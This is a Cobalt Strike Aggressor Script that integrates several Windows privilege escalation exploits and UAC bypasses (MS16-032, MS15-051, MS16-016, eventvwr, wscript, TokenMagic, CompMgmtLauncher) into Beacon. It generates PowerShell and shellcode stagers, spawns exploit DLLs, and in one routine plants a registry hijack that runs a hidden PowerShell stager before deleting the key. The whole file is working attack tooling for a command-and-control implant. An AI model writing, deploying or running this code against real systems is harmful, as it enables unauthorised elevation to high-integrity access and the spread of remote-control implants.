# Integrate several privilege escalation exploits into Cobalt Strike via Aggressor Script

# Integrate ms16-032
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc

sub ms16_032_exploit {
	local('$script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");

	# generate a PowerShell script to run our Beacon listener
	$script = artifact($2, "powershell");

	# host this script within this Beacon
	$oneliner = beacon_host_script($1, $script);

	# task Beacon to run this exploit with our one-liner that runs Beacon
	bpowershell_import!($1, getFileProper(script_resource("ElevateKit/modules"), "Invoke-MS16032.ps1"));
	bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");

	# give it another 10s to work.
	bpause($1, 10000);

	# handle staging
	bstage($1, $null, $2);
}

beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);

# Integrate Matt Nelson's file-less eventvwr.exe Bypass UAC attack
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc

sub eventvwr_exploit {
	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context");

	# generate a PowerShell script to run our Beacon listener
	$script = artifact($2, "powershell");

	# host this script within this Beacon
	$oneliner = powershell_encode_oneliner( beacon_host_script($1, $script) );

	# task Beacon to run this exploit with our one-liner that runs Beacon
	bpowershell_import!($1, getFileProper(script_resource("ElevateKit/modules"), "Invoke-EventVwrBypass.ps1"));
	bpowerpick!($1, "Invoke-EventVwrBypass -Command \" $+ $oneliner $+ \"");

	# handle staging
	bstage($1, $null, $2);
}

beacon_exploit_register("uac-eventvwr", "Bypass UAC with eventvwr.exe", &eventvwr_exploit);

# Integrate wscript.exe Bypass UAC attack
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc

sub wscript_exploit {
	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context");

	# generate a PowerShell script to run our Beacon listener
	$script = artifact($2, "powershell");

	# host this script within this Beacon
	$oneliner = powershell_encode_oneliner( beacon_host_script($1, $script) );

	# task Beacon to run this exploit with our one-liner that runs Beacon
	bpowershell_import!($1, getFileProper(script_resource("ElevateKit/modules"), "Invoke-WScriptBypassUAC.ps1"));
	bpowerpick!($1, "Invoke-WScriptBypassUAC -payload \" $+ $oneliner $+ \"");

	# handle staging
	bstage($1, $null, $2);
}

beacon_exploit_register("uac-wscript", "Bypass UAC with wscript.exe", &wscript_exploit);

# Integrate FuzzySecurity's UAC-TokenMagic.ps1 UAC Bypass
# https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1

sub tokenmagic_exploit {
    # acknowledge this command
    btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context");

    # generate a PowerShell payload
    $script = artifact($2, "powershell");

    # host script within this Beacon
    $oneliner = powershell_encode_oneliner(beacon_host_script($1, $script));

    # run the exploit
    bpowershell_import!($1, getFileProper(script_resource("ElevateKit/modules"), "UAC-TokenMagic.ps1"));
    bpowerpick!($1, 'UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c ' . $oneliner . '"');

    # handle staging
    bstage($1, $null, $2);
}

beacon_exploit_register("uac-tokenmagic", "Bypass UAC with token magic.", &tokenmagic_exploit);

# Integrate windows/local/ms15_051_client_copy_image from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb

sub ms15_051_exploit {
	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051");

	# tune our parameters based on the target arch
	if (-is64 $1) {
		$arch   = "x64";
		$dll    = getFileProper(script_resource("ElevateKit/modules"), "cve-2015-1701.x64.dll");
	}
	else {
		$arch   = "x86";
		$dll    = getFileProper(script_resource("ElevateKit/modules"), "cve-2015-1701.x86.dll");
	}

	# generate our shellcode
	$stager = shellcode($2, false, $arch);

	# make sure we have shellcode for this listener (some stagers are x86 only)
	if ($stager is $null) {
		berror($1, "No $arch stager for listener ' $+ $2 $+ '");
		return;
	}

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, $dll, $stager, "ms15-051", 5000);

	# stage our payload (if this is a bind payload)
	bstage($1, $null, $2, $arch);
}

beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
	# check if we're on an x64 system and error out.
	if (-is64 $1) {
		berror($1, "ms16-016 exploit is x86 only");
		return;
	}

	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016");

	# generate our shellcode
	$stager = shellcode($2, false, "x86");

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, getFileProper(script_resource("ElevateKit/modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

	# stage our payload (if this is a bind payload)
	bstage($1, $null, $2, $arch);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

sub compMgmtLauncher_exploit {
    btask($1, "Task Beacon to run " . listener_describe($2) . " in a high-integrity context.");

    $script = artifact($2, "powershell");

    $oneliner = beacon_host_script($1, $script);
    $oneliner = strrep($oneliner, "IEX ", "");

    $cmd = "reg add HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command /d \"";
    $cmd .= "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden iex -c " . $oneliner . "\" /f";

    bshell($1, $cmd);

    bcd($1, "C:\\Windows\\System32");

    bpowerpick($1, ".\\CompMgmtLauncher.exe");

    bshell($1, "reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f");
}

beacon_exploit_register("compmgmt", "CompMgmtLauncher UAC bypass", &compMgmtLauncher_exploit);

# Add these menu items to the bottom of the Beacon menu
popup beacon_bottom {
    # Add submenu for Elevate options
    menu "Elevate" {
        # Add MS15-051 menu option
        item "MS15-051" {
            # Run ms15_051_exploit function
            openPayloadHelper(lambda({
                ms15_051_exploit($bid, $1);
                                     }, $bid => $1));
        }

        item "MS16-016" {
            openPayloadHelper(lambda({
                ms16_016_exploit($bid, $1);
                                    }, $bid => $1));
        }

        item "MS16-032" {
            openPayloadHelper(lambda({
                ms16_032_exploit($bid, $1);
                                     }, $bid => $1));
        }

        item "CompMgmt" {
            openPayloadHelper(lambda({
                compMgmtLauncher_exploit($bid, $1);
                                     }, $bid => $1));
        }

        item "EventVwr" {
            openPayloadHelper(lambda({
                eventvwr_exploit($bid, $1);
                                     }, $bid => $1));
        }

        item "WScript" {
            openPayloadHelper(lambda({
                wscript_exploit($bid, $1);
                                     }, $bid => $1));
        }
    }
}
